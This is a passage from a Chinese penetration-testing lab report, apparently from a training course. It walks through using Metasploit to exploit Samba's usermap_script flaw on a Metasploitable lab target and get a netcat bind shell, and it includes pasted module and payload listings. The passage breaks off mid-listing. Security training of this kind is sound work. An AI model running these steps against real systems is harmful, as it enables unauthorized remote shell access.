《渗透测试 实验报告 (中国移动安全部).doc》由会员分享,可在线阅读,更多相关《渗透测试 实验报告 (中国移动安全部).doc(34页珍藏版)》请在金锄头文库上搜索。
1、渗透测试培训 3月13日第一天:主要实验总结首先利用struts2漏洞,可以直接执行任意命令,取得主机控制权。实验环境:KALI linux 作为攻击工具;owasp 作为靶机2003 metaspoitable 实现能够成功访问使用metaspliot完成对于靶机samba 服务的攻击,获取shell 权限search samba 查找模块Use multi/samba/usemap_script 选择渗透攻击模块Show payloads 查看与该渗透模块相兼容的攻击载荷Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shellSho
2、w options 查看需要设置的参数Set RHOST 10.10.10.254 设置主机攻击主机Exploit启动攻击1、首先安装vm虚拟机程序,开启kali,owasp和metaspoitalbe等工具和搭建环境,使得网络可达,网络配置上选择nat模式,地址范围为10.10.10.0/242、开启kali虚机,进入root模式,首先进入msfconsle,修改初始密码为123456msf passwd * exec: passwd 输入新的 UNIX 密码:重新输入新的 UNIX 密码:passwd:已成功更新密码然后寻找samba模块msf search sambaMatching M
3、odules= Name Disclosure Date Rank Description - - - - auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Hea
4、p Overflow auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86) exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86) exploit/linux/
5、samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86) exploit/multi/samba
6、/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow exploit/multi/samba/usermap_script 2007-05-14 excellent Samba username map script Command Execution exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/osx/samba/trans2open 200
7、3-04-07 great Samba trans2open Overflow (Mac OS X PPC) exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC) exploit/unix/misc/distcc_exec 2002-02-01 excellent Di
8、stCC Daemon Command Execution exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow exploit/windows/license/calicclnt_getconfig 2005-03-02 avera
9、ge Computer Associates License Client GETCONFIG Overflow post/linux/gather/enum_configs normal Linux Gather Configurationsmsf use multi/samba/usermap_script 选择渗透攻击模块msf exploit(usermap_script) show payloads 查看与该渗透模块相兼容的攻击载荷Compatible Payloads= Name Disclosure Date Rank Description - - - - cmd/unix/b
10、ind_awk normal Unix Command Shell, Bind TCP (via AWK) cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd) cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat) cmd/unix/bind_netcat_gaping normal Unix Command
11、Shell, Bind TCP (via netcat -e) cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse